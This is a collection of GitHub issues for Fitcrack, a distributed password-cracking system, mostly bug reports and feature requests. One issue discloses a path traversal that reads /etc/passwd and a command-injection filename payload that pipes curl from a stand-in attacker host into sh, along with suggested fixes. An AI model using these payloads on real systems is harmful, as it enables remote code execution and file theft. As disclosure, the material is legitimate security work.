Hi, when I upload a PCFG ZIP file and then try to download it, the download fails with "An unhandled exception occurred." message.
This doesn't seem to affect anything else: running a cracking test with the newly uploaded PCFG works fine. It seems that only downloading the file back is broken.
This behaviour does not occur when downloading the default PCFGs or PCFGs generated from dictionaries; only PCFGs uploaded directly through Webadmin exhibit this behaviour.
I can see that the code is trying to look for the path stored in the database.
And in the database, the path is stored as the uploaded filename, including the .zip extension (see row 16).
+----+------------------------------------------+----------------------------------------------+------------------+---------------------+---------+
| id | name | path | keyspace | time_added | deleted |
+----+------------------------------------------+----------------------------------------------+------------------+---------------------+---------+
| 1 | john | john.zip | 1321431161 | 2019-08-30 12:14:53 | 0 |
| 2 | facebook-pastebay | facebook-pastebay.zip | 999 | 2019-08-30 12:15:08 | 0 |
| 3 | twitter-banned | twitter-banned.zip | 1096 | 2019-08-30 12:17:48 | 0 |
| 4 | adobe100 | adobe100 | 163 | 2023-03-21 17:26:27 | 1 |
| 5 | adobe100 | adobe100 | 163 | 2023-03-21 17:26:36 | 1 |
| 6 | adobe100 | adobe100 | 163 | 2023-03-21 17:27:09 | 1 |
| 7 | lmao | lmao | 163 | 2023-03-21 17:29:23 | 1 |
| 8 | lmao | lmao | 163 | 2023-03-21 17:30:27 | 1 |
| 9 | adobe100 | adobe100 | 163 | 2023-03-23 12:38:55 | 1 |
| 10 | adobe100-crlf | adobe100-crlf | 163 | 2023-03-23 12:39:03 | 1 |
| 11 | adobe100-crlf | adobe100-crlf | 163 | 2023-03-23 12:59:09 | 1 |
| 12 | bible | bible | 12570 | 2023-03-23 13:36:01 | 1 |
| 13 | yo_mamma | yo_mamma.zip | 999 | 2023-03-28 11:32:14 | 0 |
| 14 | fc_auto_test_pcfg_correct-20230328125309 | fc_auto_test_pcfg_correct-20230328125309.zip | 999 | 2023-03-28 12:53:51 | 0 |
| 15 | fc_auto_test_pcfg_correct-20230328125754 | fc_auto_test_pcfg_correct-20230328125754.zip | 999 | 2023-03-28 12:59:03 | 0 |
| 16 | fc_auto_test_pcfg_correct-20230328125934 | fc_auto_test_pcfg_correct-20230328125934.zip | 999 | 2023-03-28 13:00:12 | 0 | <=== This is the newly added PCFG; the path has a .zip extension
| 17 | darkweb2017-top1000 | darkweb2017-top1000 | 2924855812155399 | 2023-03-28 14:50:59 | 0 |
+----+------------------------------------------+----------------------------------------------+------------------+---------------------+---------+
But in the /usr/share/collections/pcfg
directory (the one the download enpoint refers to), the PCFG is stored as a directory, not a ZIP file.
alpatron@fitcrack:/usr/share/collections/pcfg$ ls -l
total 100
drwxr-xr-x 10 www-data www-data 4096 Mar 28 14:50 darkweb2017-top1000
drwxrwxrwx 10 www-data www-data 4096 Aug 30 2019 facebook-pastebay
-rwxrwxrwx 1 www-data www-data 12300 Aug 30 2019 facebook-pastebay.zip
drwxr-xr-x 10 www-data www-data 4096 Mar 28 12:53 fc_auto_test_pcfg_correct-20230328125309
drwxr-xr-x 10 www-data www-data 4096 Mar 28 12:59 fc_auto_test_pcfg_correct-20230328125754
drwxr-xr-x 10 www-data www-data 4096 Mar 28 13:00 fc_auto_test_pcfg_correct-20230328125934 <=== Uploaded PCFG is stored as directory
drwxr-xr-x 11 www-data www-data 4096 Mar 23 13:49 honeynet
drwxr-xr-x 2 www-data www-data 4096 Mar 28 12:46 image
drwxrwxrwx 10 www-data www-data 4096 Aug 30 2019 john
-rwxrwxrwx 1 www-data www-data 28695 Aug 30 2019 john.zip
drwxrwxrwx 10 www-data www-data 4096 Aug 30 2019 twitter-banned
-rwxrwxrwx 1 www-data www-data 11251 Aug 30 2019 twitter-banned.zip
drwxr-xr-x 10 www-data www-data 4096 Mar 28 11:32 yo_mamma
This mismatch causes the failure of the download endpoint.
Curiously, as I said before, this does not affect cracking jobs; they work just fine even with the database–directory mismatch.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
{"message": "An unhandled exception occurred."}
[Tue Mar 28 14:53:19.620925 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] An unhandled exception occurred.
[Tue Mar 28 14:53:19.621001 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] Traceback (most recent call last):
[Tue Mar 28 14:53:19.621020 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Tue Mar 28 14:53:19.621039 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] rv = self.dispatch_request()
[Tue Mar 28 14:53:19.621056 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Tue Mar 28 14:53:19.621075 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Tue Mar 28 14:53:19.621093 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Tue Mar 28 14:53:19.621112 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] resp = resource(*args, **kwargs)
[Tue Mar 28 14:53:19.621128 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Tue Mar 28 14:53:19.621146 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Tue Mar 28 14:53:19.621165 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Tue Mar 28 14:53:19.621184 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] resp = meth(*args, **kwargs)
[Tue Mar 28 14:53:19.621200 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 66, in get
[Tue Mar 28 14:53:19.621219 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return send_file(path, attachment_filename=pcfg.path, as_attachment=True)
[Tue Mar 28 14:53:19.621238 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/helpers.py", line 612, in send_file
[Tue Mar 28 14:53:19.621257 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return werkzeug.utils.send_file(
[Tue Mar 28 14:53:19.621273 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/werkzeug/utils.py", line 701, in send_file
[Tue Mar 28 14:53:19.621324 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] stat = os.stat(path)
[Tue Mar 28 14:53:19.621342 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] FileNotFoundError: [Errno 2] No such file or directory: '/usr/share/collections/pcfg/fc_auto_test_pcfg_correct-20230328125934.zip'
[Tue Mar 28 14:53:19.622935 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] [2023-03-28 14:53:19,621] ERROR in app: Exception on /pcfg/16 [GET]
[Tue Mar 28 14:53:19.622984 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] Traceback (most recent call last):
[Tue Mar 28 14:53:19.623002 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Tue Mar 28 14:53:19.623021 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] rv = self.dispatch_request()
[Tue Mar 28 14:53:19.623037 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Tue Mar 28 14:53:19.623055 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Tue Mar 28 14:53:19.623073 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Tue Mar 28 14:53:19.623091 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] resp = resource(*args, **kwargs)
[Tue Mar 28 14:53:19.623107 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Tue Mar 28 14:53:19.623125 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Tue Mar 28 14:53:19.623143 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Tue Mar 28 14:53:19.623161 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] resp = meth(*args, **kwargs)
[Tue Mar 28 14:53:19.623177 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 66, in get
[Tue Mar 28 14:53:19.623195 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return send_file(path, attachment_filename=pcfg.path, as_attachment=True)
[Tue Mar 28 14:53:19.623213 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/helpers.py", line 612, in send_file
[Tue Mar 28 14:53:19.623231 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return werkzeug.utils.send_file(
[Tue Mar 28 14:53:19.623247 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/werkzeug/utils.py", line 701, in send_file
[Tue Mar 28 14:53:19.623265 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] stat = os.stat(path)
[Tue Mar 28 14:53:19.623281 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] FileNotFoundError: [Errno 2] No such file or directory: '/usr/share/collections/pcfg/fc_auto_test_pcfg_correct-20230328125934.zip'
Hi. I added 2 hosts:
Could you please help me why it doesn't work with the second multi-GPU host? Both hosts are added using boinccmd tool.
I install fitcrack on Ubuntu 18.04 following this guide https://github.com/nesfit/fitcrack
I can create job on webadmin but when I launch it there is no process.
please give me instructions for this problem
Thanks
Hello. I installed Fitcrack manually, everything seems to work but on UI I can see error
Can not load http://my-ip/fitcrack/server_status.php?xml=1
Do you know how to solve it? Also, not sure how to connect from headless client as keep on getting Authorization failure: -155
, maybe it is related.
The code responsible for importing dictionaries from /usr/share/collections/import/
is flawed and contains several vulnerabilities.
First, the server does not check that files are constrained to /usr/share/collections/import/
, allowing files to be read from anywhere on the system.
POST
ing the following to /dictionary/fromFile
adds a new dictionary with the contents of /etc/passwd
on the server
{"files":[{"name":"testpasswd.txt","path":"/etc/passwd"}],"sort":false}
The "dictionary" can then be downloaded from the server, exposing the contents of /etc/passwd
:
GET /dictionary/13/download HTTP/2
Host: api.fitcrack.local
Cookie: (omitted)
HTTP/2 200 OK
Cache-Control: no-cache
Content-Disposition: attachment; filename=testpasswd_1654943996.txt
Content-Type: text/plain; charset=utf-8
Date: Sat, 11 Jun 2022 10:40:11 GMT
Etag: "1654928242.4268618-1803-3525252685"
Last-Modified: Sat, 11 Jun 2022 06:17:22 GMT
Server: Caddy
Server: Apache/2.4.37 (rocky) mod_wsgi/4.6.4 Python/3.6
Vary: Cookie
Content-Length: 1803
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
The user-supplied filename is not sanitised and is then passed to shell command context.
POST
ing the following to /dictionary/fromFile
leads to successful exploitation.
{"files":[{"name":"$(curl attackersserver.local|sh)foobar.txt","path":"test"}],"sort":false}
This will pull down code from attackersserver.local
and execute it on the Fitcrack server. For example, a reverse shell can be used to take remote control over the server:
This is partially because Popen is used with shell=True
, which is not recommended for security reasons.
fitcrack/webadmin/fitcrackAPI/src/src/api/fitcrack/functions.py
Lines 23 to 35 in 86d5986
def is_safe_path(basedir, path, follow_symlinks=True):
if follow_symlinks:
matchpath = os.path.realpath(path)
else:
matchpath = os.path.abspath(path)
return basedir == os.path.commonpath((basedir, matchpath))
To prevent RCE, apply all of the following for defence-in-depth:
shell=True
when user-controllable inputs are being passed to the command, unless absolutely necessary.Examples
Bad, always vulnerable: subprocess.Popen("./foo -a -b " + userInput, shell=True)
Not vulnerable, but not preferred: subprocess.Popen("./foo -a -b " + shlex.quote(userInput), shell=True)
Best, safe: subprocess.Popen(["./foo", "-a", "-b", userInput])
Let me know if you need any more information.
Thanks,
Lachlan
Hi, thanks for this software! I'm exploring it as an alternative to Hashtopolis.
I'm wondering if there's functionality to see the current speed of a running task (outside of the benchmark speed in the logs).
Thanks!
Flask is currently configured with a static value for SECRET_KEY
. This means that every Fitcrack installation shares the same, known, secret key. This creates a security vulnerability, as this key is (per its name) to be kept secret, as it is used for signing cookies, JWTs, etc.
fitcrack/webadmin/fitcrackAPI/src/app.py
Line 49 in 86d5986
I would suggest that the key should either be stored in a config file, and randomly generated or installation, or, preferably, generated fresh every time the server is started:
import secrets
# .........
flask_app.config['SECRET_KEY'] = secrets.token_hex(16)
Interested in your thought :) I'm happy to make a PR once a solution is agreed upon.
Sorry for noob question.
So, I was install fitcrack via README (for best experience with tutorial using Debian 9). But after installing my systemd service fitcrack always crashed with error. I try start fitcrack manually and always see this error:
boincadm@debian:~/projects/fitcrack$ ./bin/start
Traceback (most recent call last):
File "./bin/start", line 757, in <module>
config = configxml.ConfigFile(config_filename).read()
File "/home/boincadm/projects/fitcrack/py/Boinc/boincxml.py", line 138, in read
raise Exception("%s: Couldn't get elements from XML file")
Exception: %s: Couldn't get elements from XML file
config.xml
not contains by default and I can not found example for this. Please give me a way for trouble shooting.
In -h
output of ./bin/start I see
--config-file= Use specified file instead of program-path/../config.xml
But what means in program-path/../config.xml
? If it's /home/boincadm/projects/fitcrack
or /home/boincadm/projects/
this folders not contains file with same name.
I've forked this repository and updated the BOINC server to be able to run fitcrack with MySQL 8+. However, after overcoming a lot of errors, I've come to a dead end. The frontend and backend are working fine, but I can't connect to the BOINC server. When using BOINC Manager, I get an error while registering an account. Trying it with boinccmd, the registration goes fine, and the project shows up in the manager, but it says "No jobs to process", and I can't see it in the host list from the dashboard. I've looked at apache's access.log, but other than the register GET request, no other requests are being made. Can I get some help?
EDIT: I'm using Ubuntu 20.04 LTS, and actually, some of the backend stuff is broken too, like resource usage monitoring. My current setup is at http://178.250.159.53/
Hello all,
During some of our testing I have noticed that we are actually completing fragment jobs with the Weakpass 3a dictionary faster than the work generator can actually make the job for clients, is their anything we can do to speed up the work generator? looking at htop and glances it appears that it only uses 1 cpu thread, can this be changed?
Is it possible that all new host automatically get a started job?
Or do I have to add the host manually always?
thx
Hi. When installing fitcrack on ubuntu 20 with dockerm fitcrack fails to start backend, giving 500 apache error when trying to access port
backend error log:
[wsgi:error] mod_wsgi (pid=687): Failed to exec Python script file '/var/www/html/fitcrackAPI/src/wsgi.py'.
[wsgi:error] mod_wsgi (pid=687): Exception occurred processing WSGI script '/var/www/html/fitcrackAPI/src/wsgi.py'.
[wsgi:error] Traceback (most recent call last):
[wsgi:error] File "/var/www/html/fitcrackAPI/src/wsgi.py", line 12, in
[wsgi:error] from app import app as application
[wsgi:error] File "/var/www/html/fitcrackAPI/src/app.py", line 16, in
[wsgi:error] from src.api.fitcrack.endpoints.chart.chart import ns as chart_namespace
[wsgi:error] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/chart/chart.py", line 13, in
[wsgi:error] from src.database import db
[wsgi:error] File "/var/www/html/fitcrackAPI/src/src/database/init.py", line 8, in
[wsgi:error] db = SQLAlchemy()
[wsgi:error] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/init.py", line 754, in init
[wsgi:error] _include_sqlalchemy(self, query_class)
[wsgi:error] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/init.py", line 108, in _include_sqlalchemy
[wsgi:error] for key in module.all:
[wsgi:error] AttributeError: module 'sqlalchemy' has no attribute 'all'
When running large keyspace across 20+ systems I have noticed that a lot of hosts start producing "computation error" which then stops the job completing
For example i hashed "password" into NTLM, then setup a bruteforce clients start failing at 95% at keyspace 95
The bruteforce was done from 1-8 length special/upper/lower/number (?a) with 3D markov and without markov
The client log says "invalid hex character detected in mask"
Hi!
We're currently evaluating distributed cracking software for a new password cracking cluster we are building.
We really like almost everything Fitcrack has to offer, however we're running into a massive network bottleneck for dictionary based attacks.
We use 100GB+ dictionaries, and only have 1gbps networking between the 3 nodes. Because of this, we are estimating that the chunking method used by Fitcrack will massively bottleneck our performance, especially for algorithms like NTLM where we might have >500GH/s per node.
Would it be possible to implement an option to store a full copy of the dictionary on every worker, and perform the chunking on the workers, similar to hashtopolis works? This would be a game changer for us and put Fitcrack back on the table as a viable option.
Thanks
🙏
An additional question/feature request (as I have not seen it yet) - is it possible to add extra parameters to hosts, eg for a dedicated server, -w 4
or for a home user's machine, maybe -w 2
and things like that?
Hello. I found this issue in tandem with issue #66. When I try to create a dictionary that has an issue, Fitcrack rejects this and shows an error message (as expected). However, when I then try to upload the dictionary (or any dictionary with the same name) again, a "File with name buggy_dict.txt already exists. Path: /usr/share/collections/dictionaries/buggy_dict.txt" error message is shown. Since the original faulty dictionary was only half added to Fitcrack—that is to say that the file exists in /usr/share/collections/dictionaries/
but is not in the database and thus not shown in Webadmin—a dictionary with the same name can never be added again (unless one has access to the server Fitcrack is running on and removes the orphan file).
I identified that the issue stems from this part of code
Concretely, on this line
the uploaded file is saved to /usr/share/collections/dictionaries/
but in the case of any issue with the file, no cleanup of the created file is performed, causing an orphan file to be left behind that causes the described issues.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
Hello,
We have a way to update the web and server side however the database cannot be update as of current. Is their a way to update the sql database?
Hi!
Another feature I didn't see, is it possible to enable or disable an agent from the admin page without going to each machine running the BOiNC client? AKA stop it from tasking if there is any available or if it is assigned to one.
It would be great to have a webhook functionality that make possible to send valueable events notifications such as:
to telegram chat with bot, or any other notification api that accepts GET req with params.
Example webhook URI for telegram:
https://api.telegram.org/bot000000000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/sendMessage?chat_id=-0000000000000&text=URL_encoded_message_text
I am trying to install fitcrack server on a laptop but I keep encountering an "error during compilation" while installing fitcrack using the automatic installer and selecting option 1(this is the same for option 2).
Laptop specs:
aser Chromebook model:N17Q8
What is reported at the end:
make[2]: *** [Makefile:1748: libboinc_crypt_la-crypt.lo] Error 1 make[2]: Leaving directory '/root/fitcrack-2.3.0/boinc/lib' make[1]: *** [Makefile:648: all-recursive] Error 1 make[1]: Leaving directory '/root/fitcrack-2.3.0/boinc' make: *** [Makefile:552: all] Error 2 Error during compilation. root@server:~/fitcrack-2.3.0#
Full output:https://pastebin.com/cbp68hrb
Is there something im missing?
Unsure if this is purely a BOINC issue, is there a setting somewhere in fitcrack to remove this limit?
this limit stops computers from contributing more guesses and I get stuck with 0 clients working.
A thread that has a few people complaining of the same issue, this seems to stem from boinc not giving work to clients
This thread says that there is an option of MAX_TASK_LIMIT that should be accessible by the project host? I can't seem to find this option in fitcrack_OPS
I have tried to add the OneWordlistToListThemAll.txt (99gb) using the "Add from server" functionally this generates the error "An unhandled accepted exception has occurred".
Sometimes this will result in a wordlist being added, but unusable, this includes being unable to delete the entry that was created. Other times nothing happens.
According to chromium's code which works with windows pipes too:
https://chromium.googlesource.com/chromium/src/+/master/remoting/host/file_transfer/file_chooser_win.cc
We just need to do small changes to support Async I/O. Proposed changes:
https://pastebin.com/nB0Vb2jL
if (is_NONBLOCK_) {
DWORD mode = PIPE_NOWAIT;
if (!SetNamedPipeHandleState(read_, &mode, NULL, NULL)) {
RunnerUtils::runtimeException("SetNamedPipeHandleState() failed", GetLastError());
}
}
Hello, first of all thanks for the great project!
I installed everything under ubuntu 18.04 without an error message.
When I call up 127.0.0.1 to start Fitcrack, the red message "Network Error" appears.
What can be the problem?
Thanks HG
Recently trying to install fitcrack on an oracle cloud instance and keep getting the following error:
`
#0 236.9 x86_64-w64-mingw32-g++ -I'./include/' -I'./include/boinc/' -I'./include/libzip/' -DGIT_REV="\"\"" -Werror -Wall -Wextra -O3 -g3 -std=c++11 -c src/main.cpp -o obj/main.o
#0 40391.1 x86_64-w64-mingw32-g++: fatal error: Killed signal terminated program cc1plus
#0 40391.1 compilation terminated.
#0 40391.7 make: *** [Makefile:45: obj/main.o] Error 1
#0 40394.5 objcopy: './bin/runner.exe': No such file
#0 40394.8 objcopy: './bin/runner.exe': No such file
#0 40394.9 rm: cannot remove './bin/runner.exe': No such file or directory
------
Dockerfile:124
--------------------
122 | RUN apt-get install -y g++-mingw-w64-x86-64
123 | RUN chmod +x ./update_client_bins.sh
124 | >>> RUN bash ./update_client_bins.sh
125 |
126 | WORKDIR /srv/fitcrack/
--------------------
ERROR: failed to solve: process "/bin/sh -c bash ./update_client_bins.sh" did not complete successfully: exit code: 1
ubuntu@<SERVERNAME>:~/fitcrack$
Server details:
Ubuntu 22.04.1 LTS x86_64
Kernel: 5.15.0-1029-oracle
Its seems that something is terminating the compilation?
Hi,
when I try to start the daemons with the ./bin/start this happens:
root@ariel:/home/boincadm/projects/fitcrack# ./bin/start
Entering ENABLED mode
Starting daemons
No daemons for this host found - check host name in config.xml
I tried to modify the config.xml label:
localhost
to:
ariel.badnet.it
But nothing happens. The hostname on which Fitcrack is installed is https://ariel.badnet.it.
What am I doing wrong?
EDIT: solved putting only "ariel" in the host label
What hardware requirements (RAM, CPU, HD) does my server need if I want to run about 500 hosts?
Is there a bottleneck or are the hosts unlimited in number?
Adding hosts automatically is great! It would be great if I could prioritize the individual jobs. For example with a selection button between 1-3. At "1" 50% of the next 10 new hosts are assigned to the job. At "2" 30% and at "3" 20%. So you could prioritize the jobs better when new hosts sign up.
File to patch:
Skip this patch? [y]
Skipping patch.
1 out of 1 hunk ignored
The command '/bin/sh -c patch -p0 < installer/fitcrack_changes_in_boinc.patch' returned a non-zero code: 1
ERROR: Service 'fitcrack_server' failed to build : Build failed
root@docker:/home/user/fitcrack# docker-compose version
docker-compose version 1.29.2, build unknown
docker-py version: 5.0.3
CPython version: 3.10.6
OpenSSL version: OpenSSL 3.0.2 15 Mar 2022
root@docker:/home/user/fitcrack# `
From what I can tell the lines that have issues is where its trying to copy files into specific places. I verified the files are there.
Any Ideas out there in the community?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.